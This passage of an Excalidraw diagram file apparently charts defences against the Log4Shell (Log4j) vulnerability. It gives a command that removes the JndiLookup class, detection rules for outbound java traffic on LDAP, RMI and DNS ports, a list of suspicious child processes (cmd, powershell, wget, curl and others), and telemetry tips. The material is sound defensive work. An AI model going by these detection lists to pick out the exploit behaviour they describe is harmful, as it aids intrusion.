2980 | "containerId": null,
2981 | "originalText": "Remove the JNDILookup \nclass from classpath"
2982 | },
2983 | {
2984 | "id": "7eBvQNtmb47Bh8CPBsJEt",
2985 | "type": "text",
2986 | "x": 833.75,
2987 | "y": 450.1250000000001,
2988 | "width": 204.75000000000006,
2989 | "height": 41.53291814946616,
2990 | "angle": 0,
2991 | "strokeColor": "#000000",
2992 | "backgroundColor": "transparent",
2993 | "fillStyle": "hachure",
2994 | "strokeWidth": 1,
2995 | "strokeStyle": "dotted",
2996 | "roughness": 1,
2997 | "opacity": 100,
2998 | "groupIds": [],
2999 | "strokeSharpness": "sharp",
3000 | "seed": 138945472,
3001 | "version": 100,
3002 | "versionNonce": 2061454272,
3003 | "isDeleted": false,
3004 | "boundElements": null,
3005 | "updated": 1639775213778,
3006 | "text": "zip -q -d log4j-core-*.jar \norg/apache/logging/log4j/core/\nlookup/JndiLookup.class",
3007 | "fontSize": 11.658362989323836,
3008 | "fontFamily": 3,
3009 | "textAlign": "left",
3010 | "verticalAlign": "top",
3011 | "baseline": 38.53291814946616,
3012 | "containerId": null,
3013 | "originalText": "zip -q -d log4j-core-*.jar \norg/apache/logging/log4j/core/\nlookup/JndiLookup.class"
3014 | },
3015 | {
3016 | "id": "ZFfSYbAp2pZ_maI3Evhrb",
3017 | "type": "text",
3018 | "x": 1791.9308501859523,
3019 | "y": 737.5523974907978,
3020 | "width": 361,
3021 | "height": 32,
3022 | "angle": 0,
3023 | "strokeColor": "#000000",
3024 | "backgroundColor": "transparent",
3025 | "fillStyle": "hachure",
3026 | "strokeWidth": 1,
3027 | "strokeStyle": "dotted",
3028 | "roughness": 1,
3029 | "opacity": 100,
3030 | "groupIds": [],
3031 | "strokeSharpness": "sharp",
3032 | "seed": 77226944,
3033 | "version": 148,
3034 | "versionNonce": 1082119104,
3035 | "isDeleted": false,
3036 | "boundElements": null,
3037 | "updated": 1639775213778,
3038 | "text": "Detect outbound traffic from java process to dest port \n1389, 389, 1099, 53, 5353",
3039 | "fontSize": 12.457351557190878,
3040 | "fontFamily": 1,
3041 | "textAlign": "left",
3042 | "verticalAlign": "top",
3043 | "baseline": 27,
3044 | "containerId": null,
3045 | "originalText": "Detect outbound traffic from java process to dest port \n1389, 389, 1099, 53, 5353"
3046 | },
3047 | {
3048 | "type": "rectangle",
3049 | "version": 640,
3050 | "versionNonce": 1726498880,
3051 | "isDeleted": false,
3052 | "id": "RCHd0AVdqDFlQVSiK74gw",
3053 | "fillStyle": "solid",
3054 | "strokeWidth": 1,
3055 | "strokeStyle": "dotted",
3056 | "roughness": 1,
3057 | "opacity": 100,
3058 | "angle": 0,
3059 | "x": 1770.0983527632968,
3060 | "y": 783.1590214206569,
3061 | "strokeColor": "#000000",
3062 | "backgroundColor": "#ffffff",
3063 | "width": 375.2394234799217,
3064 | "height": 58.58486789667195,
3065 | "seed": 142461888,
3066 | "groupIds": [],
3067 | "strokeSharpness": "sharp",
3068 | "boundElements": [],
3069 | "updated": 1639775213778
3070 | },
3071 | {
3072 | "type": "text",
3073 | "version": 417,
3074 | "versionNonce": 282024896,
3075 | "isDeleted": false,
3076 | "id": "dWCkcYiUOkiyRiecxQ99r",
3077 | "fillStyle": "hachure",
3078 | "strokeWidth": 1,
3079 | "strokeStyle": "dotted",
3080 | "roughness": 1,
3081 | "opacity": 100,
3082 | "angle": 0,
3083 | "x": 1777.9710043003495,
3084 | "y": 792.2053082287841,
3085 | "strokeColor": "#000000",
3086 | "backgroundColor": "transparent",
3087 | "width": 362,
3088 | "height": 48,
3089 | "seed": 535154752,
3090 | "groupIds": [],
3091 | "strokeSharpness": "sharp",
3092 | "boundElements": [],
3093 | "updated": 1639775213778,
3094 | "fontSize": 12.457351557190883,
3095 | "fontFamily": 1,
3096 | "text": "Detect java[.exe] processes that spawn unusual child \nprocesses : cmd, powershell, perl, python, wget, curl, wscript,\njscript",
3097 | "baseline": 43,
3098 | "textAlign": "left",
3099 | "verticalAlign": "top",
3100 | "containerId": null,
3101 | "originalText": "Detect java[.exe] processes that spawn unusual child \nprocesses : cmd, powershell, perl, python, wget, curl, wscript,\njscript"
3102 | },
3103 | {
3104 | "type": "text",
3105 | "version": 500,
3106 | "versionNonce": 1260599360,
3107 | "isDeleted": false,
3108 | "id": "so4gtf0SpSiiwT9d5rv0Y",
3109 | "fillStyle": "hachure",
3110 | "strokeWidth": 1,
3111 | "strokeStyle": "dotted",
3112 | "roughness": 1,
3113 | "opacity": 100,
3114 | "angle": 0,
3115 | "x": 1792.7500000000002,
3116 | "y": 857.3750000000002,
3117 | "strokeColor": "#000000",
3118 | "backgroundColor": "transparent",
3119 | "width": 331,
3120 | "height": 16,
3121 | "seed": 1687366592,
3122 | "groupIds": [],
3123 | "strokeSharpness": "sharp",
3124 | "boundElements": [],
3125 | "updated": 1639775213779,
3126 | "fontSize": 12.457351557190883,
3127 | "fontFamily": 1,
3128 | "text": "Detect persistence in crontab or systemd [for Linux]",
3129 | "baseline": 11,
3130 | "textAlign": "left",
3131 | "verticalAlign": "top",
3132 | "containerId": null,
3133 | "originalText": "Detect persistence in crontab or systemd [for Linux]"
3134 | },
3135 | {
3136 | "id": "akgWC4bsmKgfXnpQTaveg",
3137 | "type": "rectangle",
3138 | "x": 1786.25,
3139 | "y": 851.3750000000002,
3140 | "width": 345,
3141 | "height": 27.5,
3142 | "angle": 0,
3143 | "strokeColor": "#000000",
3144 | "backgroundColor": "transparent",
3145 | "fillStyle": "hachure",
3146 | "strokeWidth": 1,
3147 | "strokeStyle": "dotted",
3148 | "roughness": 1,
3149 | "opacity": 100,
3150 | "groupIds": [],
3151 | "strokeSharpness": "sharp",
3152 | "seed": 1533481024,
3153 | "version": 39,
3154 | "versionNonce": 1442540480,
3155 | "isDeleted": false,
3156 | "boundElements": null,
3157 | "updated": 1639775213779
3158 | },
3159 | {
3160 | "id": "YaW6QgbWRY665ksTHQ764",
3161 | "type": "text",
3162 | "x": 1389.8987960523987,
3163 | "y": 328.8750000000001,
3164 | "width": 182.6012039476011,
3165 | "height": 54.78036118428033,
3166 | "angle": 0,
3167 | "strokeColor": "#000000",
3168 | "backgroundColor": "transparent",
3169 | "fillStyle": "hachure",
3170 | "strokeWidth": 1,
3171 | "strokeStyle": "dotted",
3172 | "roughness": 1,
3173 | "opacity": 100,
3174 | "groupIds": [],
3175 | "strokeSharpness": "sharp",
3176 | "seed": 1238558784,
3177 | "version": 102,
3178 | "versionNonce": 1031297088,
3179 | "isDeleted": false,
3180 | "boundElements": null,
3181 | "updated": 1639775361576,
3182 | "text": "suricata (\"2021-44228\" \nOR \"Log4j\" \nOR \"Log4Shell\")",
3183 | "fontSize": 14.608096315808089,
3184 | "fontFamily": 1,
3185 | "textAlign": "center",
3186 | "verticalAlign": "top",
3187 | "baseline": 49.78036118428033,
3188 | "containerId": null,
3189 | "originalText": "suricata (\"2021-44228\" \nOR \"Log4j\" \nOR \"Log4Shell\")"
3190 | },
3191 | {
3192 | "id": "PMsI0HnHx0ePi_wU74j3H",
3193 | "type": "text",
3194 | "x": 1832.5,
3195 | "y": 897.6250000000002,
3196 | "width": 252,
3197 | "height": 40,
3198 | "angle": 0,
3199 | "strokeColor": "#000000",
3200 | "backgroundColor": "transparent",
3201 | "fillStyle": "hachure",
3202 | "strokeWidth": 1,
3203 | "strokeStyle": "dotted",
3204 | "roughness": 1,
3205 | "opacity": 100,
3206 | "groupIds": [],
3207 | "strokeSharpness": "sharp",
3208 | "seed": 1482970048,
3209 | "version": 80,
3210 | "versionNonce": 828516416,
3211 | "isDeleted": false,
3212 | "boundElements": null,
3213 | "updated": 1639775213779,
3214 | "text": "Look for new outbound \nTraffic Detection from baseline",
3215 | "fontSize": 16,
3216 | "fontFamily": 1,
3217 | "textAlign": "left",
3218 | "verticalAlign": "top",
3219 | "baseline": 34,
3220 | "containerId": null,
3221 | "originalText": "Look for new outbound \nTraffic Detection from baseline"
3222 | },
3223 | {
3224 | "id": "x_hSYjY8PX--Z2rQawjN7",
3225 | "type": "rectangle",
3226 | "x": 1825,
3227 | "y": 890.1250000000002,
3228 | "width": 271.25,
3229 | "height": 53.75,
3230 | "angle": 0,
3231 | "strokeColor": "#000000",
3232 | "backgroundColor": "transparent",
3233 | "fillStyle": "hachure",
3234 | "strokeWidth": 1,
3235 | "strokeStyle": "dotted",
3236 | "roughness": 1,
3237 | "opacity": 100,
3238 | "groupIds": [],
3239 | "strokeSharpness": "sharp",
3240 | "seed": 777595840,
3241 | "version": 30,
3242 | "versionNonce": 727940032,
3243 | "isDeleted": false,
3244 | "boundElements": null,
3245 | "updated": 1639775213779
3246 | },
3247 | {
3248 | "type": "rectangle",
3249 | "version": 371,
3250 | "versionNonce": 1265836096,
3251 | "isDeleted": false,
3252 | "id": "dHfAplUlPNP594DD-TMyK",
3253 | "fillStyle": "solid",
3254 | "strokeWidth": 1,
3255 | "strokeStyle": "dotted",
3256 | "roughness": 1,
3257 | "opacity": 100,
3258 | "angle": 0,
3259 | "x": 868.8366557399083,
3260 | "y": 723.5061106826715,
3261 | "strokeColor": "#000000",
3262 | "backgroundColor": "#ffffff",
3263 | "width": 354.82668852018355,
3264 | "height": 76.98777863465737,
3265 | "seed": 19986496,
3266 | "groupIds": [],
3267 | "strokeSharpness": "sharp",
3268 | "boundElements": [],
3269 | "updated": 1639775213779
3270 | },
3271 | {
3272 | "id": "s2z_uX9WQ7Exg_WXqyDhr",
3273 | "type": "text",
3274 | "x": 886.25,
3275 | "y": 745.6250000000002,
3276 | "width": 322,
3277 | "height": 40,
3278 | "angle": 0,
3279 | "strokeColor": "#000000",
3280 | "backgroundColor": "transparent",
3281 | "fillStyle": "hachure",
3282 | "strokeWidth": 1,
3283 | "strokeStyle": "dotted",
3284 | "roughness": 1,
3285 | "opacity": 100,
3286 | "groupIds": [],
3287 | "strokeSharpness": "sharp",
3288 | "seed": 853504064,
3289 | "version": 104,
3290 | "versionNonce": 821953472,
3291 | "isDeleted": false,
3292 | "boundElements": null,
3293 | "updated": 1639775213779,
3294 | "text": "Can be leveraged to identify log4j-based\napplication and helps if no CMDB",
3295 | "fontSize": 16,
3296 | "fontFamily": 1,
3297 | "textAlign": "left",
3298 | "verticalAlign": "top",
3299 | "baseline": 34,
3300 | "containerId": null,
3301 | "originalText": "Can be leveraged to identify log4j-based\napplication and helps if no CMDB"
3302 | },
3303 | {
3304 | "type": "rectangle",
3305 | "version": 405,
3306 | "versionNonce": 1755650112,
3307 | "isDeleted": false,
3308 | "id": "-Ozi9eUxhh7KvRrf5G-e4",
3309 | "fillStyle": "solid",
3310 | "strokeWidth": 1,
3311 | "strokeStyle": "dotted",
3312 | "roughness": 1,
3313 | "opacity": 100,
3314 | "angle": 0,
3315 | "x": 871.3366557399083,
3316 | "y": 815.3811106826715,
3317 | "strokeColor": "#000000",
3318 | "backgroundColor": "#ffffff",
3319 | "width": 354.82668852018355,
3320 | "height": 56.987778634657374,
3321 | "seed": 2113665984,
3322 | "groupIds": [],
3323 | "strokeSharpness": "sharp",
3324 | "boundElements": [],
3325 | "updated": 1639775213780
3326 | },
3327 | {
3328 | "id": "R_9fF01m5daQzxKK1eVhF",
3329 | "type": "text",
3330 | "x": 886.25,
3331 | "y": 826.8750000000002,
3332 | "width": 329,
3333 | "height": 40,
3334 | "angle": 0,
3335 | "strokeColor": "#000000",
3336 | "backgroundColor": "transparent",
3337 | "fillStyle": "hachure",
3338 | "strokeWidth": 1,
3339 | "strokeStyle": "dotted",
3340 | "roughness": 1,
3341 | "opacity": 100,
3342 | "groupIds": [],
3343 | "strokeSharpness": "sharp",
3344 | "seed": 1756134336,
3345 | "version": 87,
3346 | "versionNonce": 2094534720,
3347 | "isDeleted": false,
3348 | "boundElements": null,
3349 | "updated": 1639775213780,
3350 | "text": "Can detect outbound traffic to malicious\nIP/FQDN",
3351 | "fontSize": 16,
3352 | "fontFamily": 1,
3353 | "textAlign": "left",
3354 | "verticalAlign": "top",
3355 | "baseline": 34,
3356 | "containerId": null,
3357 | "originalText": "Can detect outbound traffic to malicious\nIP/FQDN"
3358 | },
3359 | {
3360 | "type": "rectangle",
3361 | "version": 475,
3362 | "versionNonce": 1755321280,
3363 | "isDeleted": false,
3364 | "id": "08Hf1HvcjrHoSbzyzlorT",
3365 | "fillStyle": "solid",
3366 | "strokeWidth": 1,
3367 | "strokeStyle": "dotted",
3368 | "roughness": 1,
3369 | "opacity": 100,
3370 | "angle": 0,
3371 | "x": 872.5866557399083,
3372 | "y": 887.8811106826715,
3373 | "strokeColor": "#000000",
3374 | "backgroundColor": "#ffffff",
3375 | "width": 354.82668852018355,
3376 | "height": 45.737778634657396,
3377 | "seed": 630299584,
3378 | "groupIds": [],
3379 | "strokeSharpness": "sharp",
3380 | "boundElements": [],
3381 | "updated": 1639775213780
3382 | },
3383 | {
3384 | "id": "bv6uM1yKnaOTZDWrtoSPq",
3385 | "type": "text",
3386 | "x": 901.25,
3387 | "y": 893.1250000000002,
3388 | "width": 295,
3389 | "height": 40,
3390 | "angle": 0,
3391 | "strokeColor": "#000000",
3392 | "backgroundColor": "transparent",
3393 | "fillStyle": "hachure",
3394 | "strokeWidth": 1,
3395 | "strokeStyle": "dotted",
3396 | "roughness": 1,
3397 | "opacity": 100,
3398 | "groupIds": [],
3399 | "strokeSharpness": "sharp",
3400 | "seed": 189950016,
3401 | "version": 67,
3402 | "versionNonce": 2146175040,
3403 | "isDeleted": false,
3404 | "boundElements": null,
3405 | "updated": 1639775213780,
3406 | "text": "Identify strange parent/child process\ncombinations ",
3407 | "fontSize": 16,
3408 | "fontFamily": 1,
3409 | "textAlign": "left",
3410 | "verticalAlign": "top",
3411 | "baseline": 34,
3412 | "containerId": null,
3413 | "originalText": "Identify strange parent/child process\ncombinations "
3414 | },
3415 | {
3416 | "type": "rectangle",
3417 | "version": 513,
3418 | "versionNonce": 1256692672,
3419 | "isDeleted": false,
3420 | "id": "LR9FuQZxdC6MR0kdCm9_7",
3421 | "fillStyle": "solid",
3422 | "strokeWidth": 1,
3423 | "strokeStyle": "dotted",
3424 | "roughness": 1,
3425 | "opacity": 100,
3426 | "angle": 0,
3427 | "x": 872.5866557399083,
3428 | "y": 943.5061106826715,
3429 | "strokeColor": "#000000",
3430 | "backgroundColor": "#ffffff",
3431 | "width": 354.82668852018355,
3432 | "height": 45.737778634657396,
3433 | "seed": 1829479360,
3434 | "groupIds": [],
3435 | "strokeSharpness": "sharp",
3436 | "boundElements": [],
3437 | "updated": 1639775213780
3438 | },
3439 | {
3440 | "type": "text",
3441 | "version": 168,
3442 | "versionNonce": 1841365056,
3443 | "isDeleted": false,
3444 | "id": "XpbUDNp_g0nnSRg2As3d5",
3445 | "fillStyle": "hachure",
3446 | "strokeWidth": 1,
3447 | "strokeStyle": "dotted",
3448 | "roughness": 1,
3449 | "opacity": 100,
3450 | "angle": 0,
3451 | "x": 942.4999999999998,
3452 | "y": 957.5000000000002,
3453 | "strokeColor": "#000000",
3454 | "backgroundColor": "transparent",
3455 | "width": 222,
3456 | "height": 20,
3457 | "seed": 1975613504,
3458 | "groupIds": [],
3459 | "strokeSharpness": "sharp",
3460 | "boundElements": [],
3461 | "updated": 1639775213780,
3462 | "fontSize": 16,
3463 | "fontFamily": 1,
3464 | "text": "Hash-based binary detection",
3465 | "baseline": 14,
3466 | "textAlign": "left",
3467 | "verticalAlign": "top",
3468 | "containerId": null,
3469 | "originalText": "Hash-based binary detection"
3470 | },
3471 | {
3472 | "id": "z5thYEdzM93C3i67KZP8X",
3473 | "type": "rectangle",
3474 | "x": 115,
3475 | "y": 458.8750000000001,
3476 | "width": 466.25,
3477 | "height": 86.25,
3478 | "angle": 0,
3479 | "strokeColor": "#000000",
3480 | "backgroundColor": "#fa5252",
3481 | "fillStyle": "hachure",
3482 | "strokeWidth": 1,
3483 | "strokeStyle": "dotted",
3484 | "roughness": 1,
3485 | "opacity": 50,
3486 | "groupIds": [],
3487 | "strokeSharpness": "sharp",
3488 | "seed": 1294487616,
3489 | "version": 37,
3490 | "versionNonce": 184427456,
3491 | "isDeleted": false,
3492 | "boundElements": null,
3493 | "updated": 1639775213781
3494 | },
3495 | {
3496 | "type": "rectangle",
3497 | "version": 93,
3498 | "versionNonce": 1178007616,
3499 | "isDeleted": false,
3500 | "id": "fPZUE66z8bKAj7KvspHf5",
3501 | "fillStyle": "hachure",
3502 | "strokeWidth": 1,
3503 | "strokeStyle": "dotted",
3504 | "roughness": 1,
3505 | "opacity": 50,
3506 | "angle": 0,
3507 | "x": 110.625,
3508 | "y": 969.5000000000002,
3509 | "strokeColor": "#000000",
3510 | "backgroundColor": "#4c6ef5",
3511 | "width": 466.25,
3512 | "height": 86.25,
3513 | "seed": 467056704,
3514 | "groupIds": [],
3515 | "strokeSharpness": "sharp",
3516 | "boundElements": [],
3517 | "updated": 1639775213781
3518 | },
3519 | {
3520 | "type": "rectangle",
3521 | "version": 215,
3522 | "versionNonce": 1575828416,
3523 | "isDeleted": false,
3524 | "id": "i6gEl8WVGZgnHwgYRjvMr",
3525 | "fillStyle": "hachure",
3526 | "strokeWidth": 1,
3527 | "strokeStyle": "dotted",
3528 | "roughness": 1,
3529 | "opacity": 50,
3530 | "angle": 0,
3531 | "x": 810.625,
3532 | "y": 1008.2500000000002,
3533 | "strokeColor": "#000000",
3534 | "backgroundColor": "#15aabf",
3535 | "width": 236.24999999999994,
3536 | "height": 67.48999999999998,
3537 | "seed": 1040894016,
3538 | "groupIds": [],
3539 | "strokeSharpness": "sharp",
3540 | "boundElements": [],
3541 | "updated": 1639775230703
3542 | },
3543 | {
3544 | "type": "rectangle",
3545 | "version": 318,
3546 | "versionNonce": 1604032576,
3547 | "isDeleted": false,
3548 | "id": "RE7fp2Tpka791qUIwM--j",
3549 | "fillStyle": "hachure",
3550 | "strokeWidth": 1,
3551 | "strokeStyle": "dotted",
3552 | "roughness": 1,
3553 | "opacity": 50,
3554 | "angle": 0,
3555 | "x": 1076.875,
3556 | "y": 1005.1300000000003,
3557 | "strokeColor": "#000000",
3558 | "backgroundColor": "#7950f2",
3559 | "width": 218.09044616876818,
3560 | "height": 71.24000000000002,
3561 | "seed": 571336768,
3562 | "groupIds": [],
3563 | "strokeSharpness": "sharp",
3564 | "boundElements": [],
3565 | "updated": 1639775219978
3566 | },
3567 | {
3568 | "type": "rectangle",
3569 | "version": 547,
3570 | "versionNonce": 42095552,
3571 | "isDeleted": false,
3572 | "id": "t6rp2KpU3DtYjCtDzmd5w",
3573 | "fillStyle": "solid",
3574 | "strokeWidth": 1,
3575 | "strokeStyle": "dotted",
3576 | "roughness": 1,
3577 | "opacity": 100,
3578 | "angle": 0,
3579 | "x": 1353.8366557399079,
3580 | "y": 1051.0061106826715,
3581 | "strokeColor": "#000000",
3582 | "backgroundColor": "#ffffff",
3583 | "width": 354.82668852018355,
3584 | "height": 45.737778634657396,
3585 | "seed": 340744256,
3586 | "groupIds": [],
3587 | "strokeSharpness": "sharp",
3588 | "boundElements": [],
3589 | "updated": 1639775267483
3590 | },
3591 | {
3592 | "id": "-A6VUyd83Z5K-paNfiVcl",
3593 | "type": "text",
3594 | "x": 1376.25,
3595 | "y": 1055.6250000000002,
3596 | "width": 315,
3597 | "height": 40,
3598 | "angle": 0,
3599 | "strokeColor": "#000000",
3600 | "backgroundColor": "#7950f2",
3601 | "fillStyle": "hachure",
3602 | "strokeWidth": 1,
3603 | "strokeStyle": "dotted",
3604 | "roughness": 1,
3605 | "opacity": 100,
3606 | "groupIds": [],
3607 | "strokeSharpness": "sharp",
3608 | "seed": 1205472192,
3609 | "version": 101,
3610 | "versionNonce": 887077824,
3611 | "isDeleted": false,
3612 | "boundElements": null,
3613 | "updated": 1639775302961,
3614 | "text": "Leverage Sysmon for Windows or auditd\nfor Linux to enhance security telemetry",
3615 | "fontSize": 16,
3616 | "fontFamily": 1,
3617 | "textAlign": "left",
3618 | "verticalAlign": "top",
3619 | "baseline": 34,
3620 | "containerId": null,
3621 | "originalText": "Leverage Sysmon for Windows or auditd\nfor Linux to enhance security telemetry"
3622 | },
3623 | {
3624 | "type": "rectangle",
3625 | "version": 820,
3626 | "versionNonce": 923290560,
3627 | "isDeleted": false,
3628 | "id": "TCyHUYhvgLZ5PX1844rTg",
3629 | "fillStyle": "solid",
3630 | "strokeWidth": 1,
3631 | "strokeStyle": "dotted",
3632 | "roughness": 1,
3633 | "opacity": 100,
3634 | "angle": 0,
3635 | "x": 1388.836655739908,
3636 | "y": 329.10883059499804,
3637 | "strokeColor": "#000000",
3638 | "backgroundColor": "transparent",
3639 | "width": 182.44296952323896,
3640 | "height": 55.45395751895662,
3641 | "seed": 337731648,
3642 | "groupIds": [],
3643 | "strokeSharpness": "sharp",
3644 | "boundElements": [],
3645 | "updated": 1639775361576
3646 | }
3647 | ],
3648 | "appState": {
3649 | "gridSize": null,
3650 | "viewBackgroundColor": "#ffffff"
3651 | },
3652 | "files": {
3653 | "5fc454969dece69e77ad7ac5dd993b5ada247acb": {
3654 | "mimeType": "image/png",
3655 | "id": "5fc454969dece69e77ad7ac5dd993b5ada247acb",
3656 | "dataURL": "data:image/png;base64,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",
3657 | "created": 1639754907957
3658 | }
3659 | }
3660 | }
--------------------------------------------------------------------------------